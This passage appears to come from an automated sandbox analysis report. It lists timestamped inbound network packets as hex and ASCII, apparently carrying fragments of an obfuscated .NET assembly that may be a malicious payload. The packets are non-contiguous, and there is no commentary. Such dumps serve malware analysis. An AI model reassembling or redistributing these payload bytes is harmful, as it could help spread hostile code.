2021-10-16 14:53:37 UTC	69	IN	Data Raw: 01 13 0f 11 0f 2c 08 1a 13 22 38 3a fc ff ff 1f 36 2b f5 02 04 74 10 00 00 01 6f a8 00 00 06 1f 0f 13 22 38 21 fc ff ff 03 1f 11 fe 01 13 10 11 10 2c 08 1e 13 22 38 0e fc ff ff 1f 0a 2b f5 02 04 74 10 00 00 01 6f aa 00 00 06 1f 0f 13 22 38 f5 fb ff ff 03 1f 12 fe 01 13 11 11 11 2c 09 1f 3c 13 22 38 e1 fb ff ff 1f 12 2b f5 02 04 74 10 00 00 01 6f ac 00 00 06 1f 0f 13 22 38 c8 fb ff ff 03 1f 13 fe 01 13 12 11 12 2c 09 1f 0d 13 22 38 b4 fb ff ff 1f 2a 2b f5 02 04 74 10 00 00 01 6f ae 00 00 06 1f 0f 13 22 38 9b fb ff ff 03 1f 14 fe 01 13 13 11 13 2c 09 1f 44 13 22 38 87 fb ff ff 19 2b f6 02 04 74 10 00 00 01 6f b0 00 00 06 1f 0f 13 22 38 6f fb ff ff 03 1f 15 fe 01 13 14 11 14 2c 09 1f 10 13 22 38 5b fb ff ff 1f 41 2b f5 02 04 74 14 00 00 01 6f b2 00 00 06 1f Data Ascii: ,"8:6+to"8!,"8+to"8,<"8+to"8,"8*+to"8,D"8+to"8o,"8[A+to
2021-10-16 14:53:37 UTC	70	IN	Data Raw: 00 00 0a 0b 1c 13 05 2b 82 06 17 58 0a 20 9e 01 00 00 0c 1f 4a 0d 20 8a 00 00 00 08 19 5b 09 59 32 09 1f 09 13 05 38 60 ff ff ff 16 2b f6 07 2a 16 13 05 38 53 ff ff ff 00 13 30 03 00 a6 00 00 00 3e 00 00 11 2b 3f 11 05 45 0b 00 00 00 00 00 00 00 3e 00 00 00 33 00 00 00 62 00 00 00 69 00 00 00 2c 00 00 00 62 00 00 00 33 00 00 00 13 00 00 00 0c 00 00 00 2e 00 00 00 d0 d0 00 00 06 26 1f 09 13 05 2b c1 16 0a 1e 13 05 2b ba 03 02 61 1f 12 59 06 61 45 01 00 00 00 05 00 00 00 1b 13 05 2b a4 1d 2b f9 14 0b 17 13 05 2b 9a 28 6e 00 00 0a 0b 17 13 05 2b 8f 06 17 58 0a 20 9a 04 00 00 0c 1f 1a 0d 20 4d 02 00 00 08 18 5b 09 59 32 08 19 13 05 38 6e ff ff ff 1e 2b f6 07 75 09 00 00 01 2a 1e 13 05 38 5c ff ff ff 00 00 13 30 02 00 b1 00 00 00 3f 00 00 11 2b 42 11 04 45 0c Data Ascii: +X J [Y28`+8S0>+?E>3bi,b3.&++aYaE+++(n+X M[Y28n+u8\0?+BE
2021-10-16 14:53:37 UTC	71	IN	Data Raw: 26 1e 13 0b 38 06 ff ff ff 11 05 74 1f 00 00 01 6f 49 00 00 0a 13 06 11 06 2d 08 1d 13 0b 38 ec fe ff ff 1a 2b f6 14 13 05 11 04 75 1f 00 00 01 6f 4a 00 00 0a de 0f 25 28 4e 00 00 0a 13 07 28 4f 00 00 0a de 00 1a 13 0d 11 0d 45 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 41 1c 00 00 00 00 00 00 60 00 00 00 2b 01 00 00 8b 01 00 00 0f 00 00 00 40 00 00 01 1b 30 07 00 3f 03 00 00 43 00 00 11 1b 13 09 11 09 45 11 00 00 00 86 00 00 00 64 02 00 00 45 01 00 00 2a 00 00 00 4a 00 00 00 00 00 00 00 7c 01 00 00 00 00 00 00 45 01 00 00 34 01 00 00 20 02 00 00 b2 02 00 00 8b 02 00 00 0b 01 00 00 c0 01 00 00 20 02 00 00 fa 01 00 00 02 6f ed 00 00 06 20 e3 00 00 00 20 d8 00 00 00 28 34 00 00 2b 20 82 00 00 00 20 a8 00 00 00 28 43 Data Ascii: &8toI-8+uoJ%(N(OEA`+@0?CEdEJ\|E4 o (4+ (C
2021-10-16 14:53:37 UTC	73	IN	Data Raw: 02 00 00 28 2d 00 00 2b 19 13 0c 38 1f ff ff ff 09 75 3a 00 00 01 20 ba 00 00 00 20 ce 00 00 00 28 2e 00 00 2b 13 05 11 05 75 1f 00 00 01 13 06 18 13 0c 38 f7 fe ff ff 11 06 75 1f 00 00 01 6f 49 00 00 0a 26 02 6f f9 00 00 06 11 06 75 1f 00 00 01 1c 6f 46 00 00 0a 28 4d 00 00 0a 6f 3a 00 00 0a 1b 13 0c 38 c5 fe ff ff 14 13 06 11 05 75 1f 00 00 01 6f 4a 00 00 0a de 0f 25 28 4e 00 00 0a 13 07 28 4f 00 00 0a de 00 19 13 0e 11 0e 45 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 de 0f 25 28 4e 00 00 0a 13 08 28 4f 00 00 0a de 00 18 13 10 11 10 45 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 41 34 00 00 00 00 00 00 8d 00 00 00 4f 01 00 00 dc 01 00 00 0f 00 00 00 40 00 00 01 00 00 00 00 00 00 00 00 Data Ascii: (-+8u: (.+u8uoI&ouoF(Mo:8uoJ%(N(OE%(N(OE*A4O@
2021-10-16 14:53:37 UTC	74	IN	Data Raw: d0 10 00 00 02 28 2a 00 00 0a 1c 28 60 02 00 06 20 21 01 00 00 20 11 01 00 00 28 37 00 00 2b 1f 0f 0b 38 72 fe ff ff 02 6f f5 00 00 06 20 15 12 cd 7e 20 8c 00 00 00 d0 06 00 00 02 28 2a 00 00 0a 1a 28 60 02 00 06 20 25 01 00 00 20 15 01 00 00 28 37 00 00 2b 1d 0b 38 3c fe ff ff 02 6f ef 00 00 06 20 19 12 cd 7e 20 ce 00 00 00 d0 0b 00 00 02 28 2a 00 00 0a 1e 28 60 02 00 06 20 ba 03 00 00 20 8a 03 00 00 28 37 00 00 2b 1f 12 0b 38 05 fe ff ff 02 6f 21 01 00 06 20 12 12 cd 7e 20 f6 00 00 00 d0 03 00 00 02 28 2a 00 00 0a 19 28 60 02 00 06 20 62 01 00 00 20 52 01 00 00 28 37 00 00 2b 1c 0b 38 cf fd ff ff 02 6f 23 01 00 06 20 15 12 cd 7e 1f 12 d0 11 00 00 02 28 2a 00 00 0a 1a 28 60 02 00 06 20 0f 02 00 00 20 36 02 00 00 28 39 00 00 2b 16 0b 38 9c fd ff ff 02 6f Data Ascii: ((` ! (7+8ro ~ ((` % (7+8<o ~ ((` (7+8o! ~ ((` b R(7+8o# ~(*(` 6(9+8o
2021-10-16 14:53:37 UTC	75	IN	Data Raw: 00 00 01 1f 33 1f 39 28 2b 00 00 2b 1d 13 0b 2b be 09 75 49 00 00 01 20 3a 03 00 00 20 45 03 00 00 28 2c 00 00 2b 11 04 75 3a 00 00 01 1f 1f 8d 3b 00 00 01 25 16 20 03 14 cd 7e 1f 3a d0 27 00 00 02 28 2a 00 00 0a 1a 28 60 02 00 06 a2 25 17 02 6f 25 01 00 06 20 d1 02 00 00 20 92 02 00 00 28 3f 00 00 2b a2 25 18 20 8f 11 cd 7e 20 96 00 00 00 d0 11 00 00 02 28 2a 00 00 0a 1e 28 60 02 00 06 a2 25 19 02 6f ed 00 00 06 20 ed 01 00 00 20 d6 01 00 00 28 34 00 00 2b a2 25 1a 20 8f 11 cd 7e 20 97 00 00 00 d0 23 00 00 02 28 2a 00 00 0a 1e 28 60 02 00 06 a2 25 1b 08 20 5c 01 00 00 20 46 01 00 00 28 4b 03 00 06 a2 25 1c 20 81 11 cd 7e 20 89 00 00 00 d0 1a 00 00 02 28 2a 00 00 0a 1c 28 60 02 00 06 a2 25 1d 02 6f f3 00 00 06 20 47 01 00 00 20 04 01 00 00 28 3f 00 00 2b Data Ascii: 39(+++uI : E(,+u:;% ~:'((`%o% (?+% ~ ((`%o (4+% ~ #((`% \ F(K% ~ ((`%o G (?+
2021-10-16 14:53:37 UTC	79	IN	Data Raw: f5 00 00 06 1f 09 1f 4a 28 3f 00 00 2b a2 25 1f 0c 20 6c 11 cd 7e 1f 52 d0 14 00 00 02 28 2a 00 00 0a 19 28 60 02 00 06 a2 25 1f 0d 02 6f ef 00 00 06 20 53 03 00 00 20 10 03 00 00 28 3f 00 00 2b a2 25 1f 0e 20 92 1a cd 7e 1f 62 d0 06 00 00 02 28 2a 00 00 0a 16 28 60 02 00 06 a2 25 1f 0f 02 6f 21 01 00 06 20 c7 03 00 00 20 84 03 00 00 28 3f 00 00 2b a2 25 1f 10 20 82 1a cd 7e 1f 25 d0 28 00 00 02 28 2a 00 00 0a 17 28 60 02 00 06 a2 25 1f 11 02 6f 23 01 00 06 20 f2 01 00 00 20 ce 01 00 00 28 40 00 00 2b a2 25 1f 12 20 84 10 cd 7e 20 87 00 00 00 d0 04 00 00 02 28 2a 00 00 0a 1a 28 60 02 00 06 a2 25 1f 13 02 6f f7 00 00 06 20 f4 01 00 00 20 c8 01 00 00 28 40 00 00 2b a2 25 1f 14 20 b4 1a cd 7e 1d d0 17 00 00 02 28 2a 00 00 0a 1b 28 60 02 00 06 a2 25 1f 15 02 Data Ascii: J(?+% l~R((`%o S (?+% ~b((`%o! (?+% ~%(((`%o# (@+% ~ ((`%o (@+% ~(*(`%
2021-10-16 14:53:37 UTC	84	IN	Data Raw: 02 00 00 a9 03 00 00 da 03 00 00 aa 02 00 00 7a 02 00 00 c5 00 00 00 78 03 00 00 da 03 00 00 63 00 00 00 3d 03 00 00 00 00 00 00 00 00 00 00 4a 02 00 00 a9 03 00 00 85 01 00 00 0c 04 00 00 d2 02 00 00 28 01 00 00 02 6f 25 01 00 06 11 05 75 15 00 00 01 20 35 01 00 00 20 2d 01 00 00 28 3b 00 00 2b 03 20 b7 01 00 00 20 9e 01 00 00 28 3c 00 00 2b 16 20 70 01 00 00 20 27 01 00 00 28 3d 00 00 2b 20 ab 03 00 00 20 c9 03 00 00 28 2a 00 00 2b 20 c1 02 00 00 20 f1 02 00 00 28 37 00 00 2b 1f 0a 13 0a 38 46 ff ff ff 02 6f ed 00 00 06 11 05 74 15 00 00 01 20 8f 03 00 00 20 97 03 00 00 28 3b 00 00 2b 03 20 73 03 00 00 20 5a 03 00 00 28 3c 00 00 2b 17 20 7a 02 00 00 20 2d 02 00 00 28 3d 00 00 2b 20 ab 02 00 00 20 c9 02 00 00 28 2a 00 00 2b 20 a9 00 00 00 20 c3 00 00 00 Data Ascii: zxc=J(o%u 5 -(;+ (<+ p '(=+ (+ (7+8Fot (;+ s Z(<+ z -(=+ (+
2021-10-16 14:53:37 UTC	87	IN	Data Raw: bc 01 00 00 20 dd 01 00 00 28 51 00 00 2b 02 03 0c 7b 6b 00 00 04 08 75 10 00 00 01 7d 34 01 00 04 02 7b 6b 00 00 04 7b 34 01 00 04 0b 19 13 04 38 6a ff ff ff 07 74 10 00 00 01 2c 08 17 13 04 38 5a ff ff ff 18 2b f6 07 75 10 00 00 01 06 75 3d 00 00 01 6f 63 00 00 0a 2a 00 00 13 30 04 00 95 00 00 00 2a 00 00 11 16 0d 09 45 08 00 00 00 00 00 00 00 5b 00 00 00 4c 00 00 00 3e 00 00 00 6c 00 00 00 23 00 00 00 14 00 00 00 4c 00 00 00 02 fe 06 dd 00 00 06 73 40 00 00 0a 0a 02 7b 63 00 00 04 0b 07 75 10 00 00 01 2c 04 1b 0d 2b ba 19 2b fa 07 75 10 00 00 01 06 75 3d 00 00 01 20 60 03 00 00 20 01 03 00 00 28 51 00 00 2b 02 03 7d 63 00 00 04 02 7b 63 00 00 04 0b 07 75 10 00 00 01 2c 04 17 0d 2b 82 1a 2b fa 07 75 10 00 00 01 06 75 3d 00 00 01 6f 63 00 00 0a 2a 00 00 Data Ascii: (Q+{ku}4{k{48jt,8Z+uu=oc0E[L>l#Ls@{cu,++uu= ` (Q+}c{cu,++uu=oc*
2021-10-16 14:53:37 UTC	91	IN	Data Raw: 00 01 6f 22 01 00 06 1f 34 13 23 38 1d fa ff ff 03 1f 1c fe 01 13 1b 11 1b 2c 09 1f 3e 13 23 38 09 fa ff ff 1f 43 2b f5 02 04 74 13 00 00 01 6f 24 01 00 06 1f 34 13 23 38 f0 f9 ff ff 03 1f 1d fe 01 13 1c 11 1c 2c 09 1f 29 13 23 38 dc f9 ff ff 1f 25 2b f5 02 04 74 0f 00 00 01 6f 26 01 00 06 1f 34 13 23 38 c3 f9 ff ff 03 1f 1e fe 01 13 1d 11 1d 2c 09 1f 3b 13 23 38 af f9 ff ff 1f 32 2b f5 02 04 74 0f 00 00 01 6f 28 01 00 06 1f 34 13 23 38 96 f9 ff ff 03 1f 1f fe 01 13 1e 11 1e 2c 09 1f 0e 13 23 38 82 f9 ff ff 1f 46 2b f5 02 04 74 10 00 00 01 6f 2a 01 00 06 1f 34 13 23 38 69 f9 ff ff 03 1f 20 fe 01 13 1f 11 1f 2c 09 1f 2f 13 23 38 55 f9 ff ff 1f 2c 2b f5 02 04 74 10 00 00 01 6f 2c 01 00 06 1f 34 13 23 38 3c f9 ff ff 03 1f 21 fe 01 13 20 11 20 2c 09 1f 2b 13 Data Ascii: o"4#8,>#8C+to$4#8,)#8%+to&4#8,;#82+to(4#8,#8F+to*4#8i ,/#8U,+to,4#8<! ,+
2021-10-16 14:53:37 UTC	96	IN	Data Raw: 00 01 07 74 49 00 00 01 20 b1 01 00 00 20 bb 01 00 00 28 2b 00 00 2b 16 13 09 2b b9 07 75 49 00 00 01 20 c3 01 00 00 20 bc 01 00 00 28 2c 00 00 2b 08 74 3a 00 00 01 1f 09 8d 3b 00 00 01 25 16 20 69 19 cd 7e 20 94 00 00 00 d0 26 00 00 02 28 2a 00 00 0a 1a 28 60 02 00 06 a2 25 17 02 6f 61 01 00 06 20 d6 03 00 00 20 95 03 00 00 28 3f 00 00 2b a2 25 18 20 b5 18 cd 7e 1f 1c d0 27 00 00 02 28 2a 00 00 0a 1e 28 60 02 00 06 a2 25 19 02 6f 5d 01 00 06 1f 48 1f 0b 28 3f 00 00 2b a2 25 1a 20 d0 18 cd 7e 1f 36 d0 04 00 00 02 28 2a 00 00 0a 1c 28 60 02 00 06 a2 25 1b 02 6f 5f 01 00 06 20 e2 02 00 00 20 a1 02 00 00 28 3f 00 00 2b a2 25 1c 20 c0 18 cd 7e 1f 36 d0 11 00 00 02 28 2a 00 00 0a 1b 28 60 02 00 06 a2 25 1d 02 6f 63 01 00 06 20 b5 01 00 00 20 8e 01 00 00 28 34 Data Ascii: tI (+++uI (,+t:;% i~ &((`%oa (?+% ~'((`%o]H(?+% ~6((`%o_ (?+% ~6((`%oc (4
2021-10-16 14:53:37 UTC	100	IN	Data Raw: ff ff 07 74 10 00 00 01 2c 08 16 13 04 38 5a ff ff ff 1c 2b f6 07 74 10 00 00 01 06 74 3d 00 00 01 6f 63 00 00 0a 2a 00 00 13 30 04 00 95 00 00 00 2c 00 00 11 1b 0d 09 45 08 00 00 00 6c 00 00 00 45 00 00 00 5b 00 00 00 6c 00 00 00 23 00 00 00 00 00 00 00 4c 00 00 00 3e 00 00 00 02 fe 06 40 01 00 06 73 40 00 00 0a 0a 02 7b 83 00 00 04 0b 07 75 10 00 00 01 2c 04 1a 0d 2b ba 1d 2b fa 07 75 10 00 00 01 06 75 3d 00 00 01 20 95 01 00 00 20 f4 01 00 00 28 51 00 00 2b 02 03 7d 83 00 00 04 02 7b 83 00 00 04 0b 07 75 10 00 00 01 2c 04 18 0d 2b 82 19 2b fa 07 74 10 00 00 01 06 75 3d 00 00 01 6f 63 00 00 0a 2a 00 00 00 13 30 04 00 be 00 00 00 55 00 00 11 17 13 04 11 04 45 09 00 00 00 44 00 00 00 00 00 00 00 8f 00 00 00 44 00 00 00 7e 00 00 00 7e 00 00 00 7e 00 00 00 Data Ascii: t,8Z+tt=oc0,ElE[l#L>@s@{u,++uu= (Q+}{u,++tu=oc0UEDD~~~
2021-10-16 14:53:37 UTC	104	IN	Data Raw: 1f 7f 1f 70 28 3e 00 00 2b 13 05 17 13 0d 2b 8b 11 05 16 fe 01 13 08 11 08 2c 08 1a 13 0d 38 78 ff ff ff 1c 2b f6 02 6f 96 01 00 06 16 20 f6 02 00 00 20 ec 02 00 00 28 4b 03 00 06 6f 3a 00 00 0a 16 13 0d 38 52 ff ff ff 17 11 05 d6 1f 64 d6 13 06 02 6f 96 01 00 06 11 06 28 51 00 00 0a 6f 3a 00 00 0a 18 13 0d 38 2f ff ff ff 16 13 0d 38 27 ff ff ff de 0f 25 28 4e 00 00 0a 13 09 28 4f 00 00 0a de 00 19 13 0f 11 0f 45 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 14 13 07 2a 00 01 10 00 00 00 00 1b 01 df fa 01 0f 40 00 00 01 1b 30 08 00 50 02 00 00 6d 00 00 11 7e 5e 01 00 04 13 0b 17 13 08 11 08 45 05 00 00 00 2b 00 00 00 00 00 00 00 00 00 00 00 3c 00 00 00 30 00 00 00 73 4d 03 00 06 0b 02 6f 98 01 00 06 20 23 01 00 00 20 7b 01 00 00 Data Ascii: p(>++,8x+o (Ko:8Rdo(Qo:8/8'%(N(OE*@0Pm~^E+<0sMo # {
2021-10-16 14:53:37 UTC	108	IN	Data Raw: 3b 00 00 01 6f 80 00 00 0a 17 13 0c 38 1e ff ff ff 11 06 17 d6 13 06 1f 0c 13 0c 38 0f ff ff ff 11 06 11 05 75 0a 00 00 1b 8e 69 fe 04 13 08 11 08 2d 08 1e 13 0c 38 f4 fe ff ff 18 2b f6 07 74 0f 00 00 1b 6f 81 00 00 0a 17 da 17 d6 8d 3b 00 00 01 13 04 11 04 75 0a 00 00 1b 8e 69 17 da 13 09 1f 0b 13 0c 38 c5 fe ff ff 16 0c 1f 0a 13 0c 38 ba fe ff ff 11 04 74 0a 00 00 1b 08 07 75 0f 00 00 1b 08 6f 82 00 00 0a a2 08 17 d6 0c 1f 0a 13 0c 38 98 fe ff ff 08 11 09 31 08 1c 13 0c 38 8b fe ff ff 1f 0d 2b f5 11 04 74 0a 00 00 1b 0a de 1b 25 20 2e 02 00 00 20 0a 02 00 00 28 49 00 00 2b 13 0a 14 0a 28 4f 00 00 0a de 00 17 13 0e 11 0e 45 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 74 0a 00 00 1b 2a 00 41 1c 00 00 00 00 00 00 00 00 00 00 Data Ascii: ;o88ui-8+to;ui88tuo818+t% . (I+(OEt*A
2021-10-16 14:53:37 UTC	112	IN	Data Raw: 00 00 00 47 00 00 00 32 00 00 00 58 00 00 00 43 00 00 00 00 00 00 00 d0 9d 01 00 06 26 1c 13 04 2b be 16 0a 1b 13 04 2b b7 03 04 61 1f 5e 59 06 61 45 01 00 00 00 05 00 00 00 16 13 04 2b a1 1e 2b f9 14 0b 18 13 04 2b 97 02 8c 02 00 00 1b 28 47 00 00 0a 0b 18 13 04 2b 86 06 17 58 0a 04 25 5a 0c 04 08 58 0c 1f 09 13 04 38 71 ff ff ff 08 18 5d 2d 08 1a 13 04 38 64 ff ff ff 1b 2b f6 07 2a 1b 13 04 38 57 ff ff ff 00 13 30 02 00 d1 00 00 00 76 00 00 11 7e b0 00 00 04 13 05 7e 5e 01 00 04 13 06 2b 4b 11 04 45 0c 00 00 00 45 00 00 00 5a 00 00 00 6f 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 3e 00 00 00 45 00 00 00 82 00 00 00 6f 00 00 00 14 00 00 00 80 00 00 00 d0 9e 01 00 06 26 11 05 20 d1 00 00 00 91 1b 5a 13 04 2b b5 16 0a 11 06 1f 2c 93 20 d0 b6 00 00 59 13 Data Ascii: G2XC&++a^YaE+++(G+X%ZX8q]-8d+*8W0v~~^+KEEZo%>Eo& Z+, Y
2021-10-16 14:53:37 UTC	116	IN	Data Raw: 00 00 00 b1 00 00 00 65 00 00 00 02 6f e1 01 00 06 20 2f 03 00 00 20 77 03 00 00 28 29 00 00 2b 20 76 03 00 00 20 17 03 00 00 28 2a 00 00 2b 0a 19 13 0b 2b af 06 74 3b 00 00 01 73 42 00 00 0a 0b 73 43 00 00 0a 0c 73 43 00 00 0a 0d 08 75 3a 00 00 01 07 74 49 00 00 01 20 a6 03 00 00 20 ac 03 00 00 28 2b 00 00 2b 1a 13 0b 38 74 ff ff ff 07 74 49 00 00 01 20 dd 00 00 00 20 a2 00 00 00 28 2c 00 00 2b 08 74 3a 00 00 01 20 18 03 cd 7e 20 81 00 00 00 d0 06 00 00 02 28 2a 00 00 0a 19 28 60 02 00 06 20 e3 02 00 00 20 db 02 00 00 28 2d 00 00 2b 1c 13 0b 38 28 ff ff ff 08 75 3a 00 00 01 73 50 00 00 0a 13 04 11 04 74 72 00 00 01 02 7b b1 00 00 04 7b 6c 00 00 04 20 54 01 00 00 20 03 01 00 00 28 3a 00 00 2b 26 16 13 0b 38 f1 fe ff ff 02 7b b1 00 00 04 7b 6c 00 00 04 13 Data Ascii: eo / w()+ v (++t;sBsCsCu:tI (++8ttI (,+t: ~ ((` (-+8(u:sPtr{{l T (:+&8{{l
2021-10-16 14:53:37 UTC	119	IN	Data Raw: 00 2a 00 00 41 34 00 00 00 00 00 00 c3 01 00 00 b8 02 00 00 7b 04 00 00 21 00 00 00 40 00 00 01 00 00 00 00 d9 00 00 00 ef 03 00 00 c8 04 00 00 0f 00 00 00 40 00 00 01 1b 30 08 00 6e 04 00 00 7d 00 00 11 18 13 07 11 07 45 05 00 00 00 24 00 00 00 24 00 00 00 00 00 00 00 24 00 00 00 00 00 00 00 02 6f e1 01 00 06 20 c8 02 00 00 20 90 02 00 00 28 29 00 00 2b 1f 3b 1f 5a 28 2a 00 00 2b 0a 19 13 07 2b c1 06 75 3b 00 00 01 73 42 00 00 0a 0b 73 43 00 00 0a 0c 73 43 00 00 0a 0d 16 13 09 11 09 45 08 00 00 00 00 00 00 00 20 00 00 00 4e 03 00 00 35 00 00 00 00 00 00 00 4e 03 00 00 a8 03 00 00 9d 03 00 00 08 74 3a 00 00 01 07 75 49 00 00 01 20 b7 01 00 00 20 bd 01 00 00 28 2b 00 00 2b 17 13 09 2b b9 07 75 49 00 00 01 20 b2 00 00 00 20 cd 00 00 00 28 2c 00 00 2b 08 75 Data Ascii: A4{!@@0n}E$$$o ()+;Z(++u;sBsCsCE N5Nt:uI (+++uI (,+u
2021-10-16 14:53:37 UTC	123	IN	Data Raw: 75 15 00 00 01 20 d1 00 00 00 20 c9 00 00 00 28 3b 00 00 2b 03 20 45 01 00 00 20 6c 01 00 00 28 3c 00 00 2b 1a 20 dc 02 00 00 20 8b 02 00 00 28 3d 00 00 2b 20 1b 01 00 00 20 79 01 00 00 28 2a 00 00 2b 20 ea 03 00 00 20 da 03 00 00 28 37 00 00 2b 1f 0f 13 0a 38 d6 fd ff ff 02 6f bd 01 00 06 11 05 74 15 00 00 01 6f 4b 00 00 0a 03 6f 3b 00 00 0a 1b 6f 3c 00 00 0a 6f 2f 00 00 0a 6f 3a 00 00 0a 1f 0b 13 0a 38 a5 fd ff ff 02 6f bf 01 00 06 11 05 74 15 00 00 01 6f 4b 00 00 0a 03 6f 3b 00 00 0a 1c 6f 3c 00 00 0a 6f 2f 00 00 0a 6f 3a 00 00 0a 1f 0e 13 0a 38 74 fd ff ff 02 6f c1 01 00 06 11 05 74 15 00 00 01 6f 4b 00 00 0a 03 6f 3b 00 00 0a 1d 6f 3c 00 00 0a 6f 2f 00 00 0a 6f 3a 00 00 0a 1c 13 0a 38 44 fd ff ff 02 6f e5 01 00 06 11 05 75 15 00 00 01 6f 4b 00 00 0a Data Ascii: u (;+ E l(<+ (=+ y(*+ (7+8otoKo;o<o/o:8otoKo;o<o/o:8totoKo;o<o/o:8DouoK
2021-10-16 14:53:37 UTC	128	IN	Data Raw: fa 07 74 0e 00 00 01 06 75 4b 00 00 01 1f 70 1f 3d 28 50 00 00 2b 02 03 7d ac 00 00 04 02 7b ac 00 00 04 0b 07 75 0e 00 00 01 2c 04 1d 0d 2b 88 18 2b fa 07 75 0e 00 00 01 06 75 4b 00 00 01 6f 62 00 00 0a 7e b0 00 00 04 20 a5 01 00 00 7e b0 00 00 04 20 a5 01 00 00 91 7e b0 00 00 04 1f 0f 91 58 20 a2 00 00 00 5f 9c 2a 13 30 02 00 14 00 00 00 2e 00 00 11 02 03 0a 7b b1 00 00 04 06 75 0f 00 00 01 7d 78 00 00 04 2a 13 30 02 00 14 00 00 00 09 00 00 11 02 03 0a 7b b1 00 00 04 06 74 14 00 00 01 7d 79 00 00 04 2a 13 30 02 00 14 00 00 00 2e 00 00 11 02 03 0a 7b b1 00 00 04 06 74 0f 00 00 01 7d 7a 00 00 04 2a 13 30 02 00 14 00 00 00 09 00 00 11 02 03 0a 7b b1 00 00 04 06 74 0f 00 00 01 7d 7b 00 00 04 2a 13 30 02 00 14 00 00 00 09 00 00 11 02 03 0a 7b b1 00 00 04 06 Data Ascii: tuKp=(P+}{u,++uuKob~ ~ ~X _0.{u}x0{t}y0.{t}z0{t}{*0{
2021-10-16 14:53:37 UTC	132	IN	Data Raw: 00 06 17 28 53 00 00 0a 26 1a 13 0a 38 6e fd ff ff 08 74 49 00 00 01 6f 54 00 00 0a de 0f 25 28 4e 00 00 0a 13 06 28 4f 00 00 0a de 00 16 13 0c 11 0c 45 06 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 29 00 00 00 00 00 00 00 00 00 00 00 02 02 7b b3 00 00 04 6f 4b 00 00 0a 6f 4c 00 00 0a 17 da 7d b2 00 00 04 02 02 7b b2 00 00 04 28 fa 01 00 06 19 13 0c 2b b8 7e 5e 01 00 04 19 7e 5e 01 00 04 19 93 7e 5e 01 00 04 19 93 5a 20 cd 00 00 00 5f 9d 2a 41 1c 00 00 00 00 00 00 67 00 00 00 a2 02 00 00 09 03 00 00 0f 00 00 00 40 00 00 01 1b 30 07 00 76 03 00 00 8b 00 00 11 1b 13 09 11 09 45 06 00 00 00 00 00 00 00 a4 00 00 00 a4 00 00 00 77 00 00 00 77 00 00 00 00 00 00 00 20 43 04 cd 7e 20 cf 00 00 00 d0 18 00 00 02 28 2a 00 00 0a 1b 28 60 02 00 06 20 19 12 cd 7e 20 Data Ascii: (S&8ntIoT%(N(OE){oKoL}{(+~^~^~^Z _Ag@0vEww C~ ((` ~
2021-10-16 14:53:37 UTC	136	IN	Data Raw: 1f 0b 13 0b 38 20 fe ff ff 02 6f 26 02 00 06 11 05 74 15 00 00 01 6f 4b 00 00 0a 03 6f 3b 00 00 0a 1c 6f 3c 00 00 0a 6f 2f 00 00 0a 6f 3a 00 00 0a 17 13 0b 38 f0 fd ff ff de 0f 25 28 4e 00 00 0a 13 06 28 4f 00 00 0a de 00 19 13 0d 11 0d 45 05 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 13 05 2a 41 1c 00 00 00 00 00 00 26 01 00 00 15 02 00 00 3b 03 00 00 0f 00 00 00 40 00 00 01 13 30 05 00 6c 00 00 00 8f 00 00 11 19 0d 09 45 05 00 00 00 15 00 00 00 43 00 00 00 00 00 00 00 00 00 00 00 43 00 00 00 28 b0 01 00 06 20 bc 00 00 00 20 e8 00 00 00 28 43 02 00 06 0b 7e 49 01 00 04 20 0e 17 cd 7e 20 fc 00 00 00 d0 07 00 00 02 28 2a 00 00 0a 1a 28 60 02 00 06 07 74 21 00 00 01 6f 72 00 00 0a 1a 0d 2b a3 28 78 01 00 06 0a 06 74 0a 00 00 1b Data Ascii: 8 o&toKo;o<o/o:8%(N(OEA&;@0lECC( (C~I ~ ((`t!or+(xt
2021-10-16 14:53:37 UTC	140	IN	Data Raw: 00 00 01 6f 13 02 00 06 1f 0b 13 15 38 c0 fd ff ff 03 1f 0a fe 01 13 09 11 09 2c 08 1d 13 15 38 ad fd ff ff 1e 2b f6 02 04 74 10 00 00 01 6f 15 02 00 06 1f 0b 13 15 38 95 fd ff ff 03 1f 0b fe 01 13 0a 11 0a 2c 09 1f 0f 13 15 38 81 fd ff ff 16 2b f6 02 04 74 10 00 00 01 6f 17 02 00 06 1f 0b 13 15 38 69 fd ff ff 03 1f 0c fe 01 13 0b 11 0b 2c 09 1f 09 13 15 38 55 fd ff ff 19 2b f6 02 04 74 10 00 00 01 6f 19 02 00 06 1f 0b 13 15 38 3d fd ff ff 03 1f 0d fe 01 13 0c 11 0c 2c 12 11 16 1f 19 93 20 68 91 00 00 59 13 15 38 20 fd ff ff 1f 0d 2b f5 02 04 74 10 00 00 01 6f 1b 02 00 06 1f 0b 13 15 38 07 fd ff ff 03 1f 0e fe 01 13 0d 11 0d 2c 09 1f 29 13 15 38 f3 fc ff ff 1f 2a 2b f5 02 04 74 10 00 00 01 6f 1d 02 00 06 1f 0b 13 15 38 da fc ff ff 03 1f 0f fe 01 13 0e 11 Data Ascii: o8,8+to8,8+to8i,8U+to8=, hY8 +to8,)8*+to8
2021-10-16 14:53:37 UTC	144	IN	Data Raw: 00 00 40 00 00 01 1b 30 08 00 e7 06 00 00 96 00 00 11 7e 5e 01 00 04 13 18 19 13 13 11 13 45 05 00 00 00 00 00 00 00 2a 00 00 00 2a 00 00 00 00 00 00 00 00 00 00 00 02 6f 35 02 00 06 20 cb 02 00 00 20 93 02 00 00 28 29 00 00 2b 20 ba 00 00 00 20 db 00 00 00 28 2a 00 00 2b 0a 17 13 13 2b bb 06 75 3b 00 00 01 73 42 00 00 0a 0b 73 43 00 00 0a 0c 1a 13 15 11 15 45 09 00 00 00 6d 00 00 00 82 00 00 00 33 00 00 00 00 00 00 00 00 00 00 00 36 01 00 00 1b 01 00 00 1b 01 00 00 6d 00 00 00 02 6f 3b 02 00 06 20 82 03 00 00 20 b9 03 00 00 28 34 00 00 2b 13 04 02 6f 37 02 00 06 20 3d 02 00 00 20 06 02 00 00 28 34 00 00 2b 13 05 18 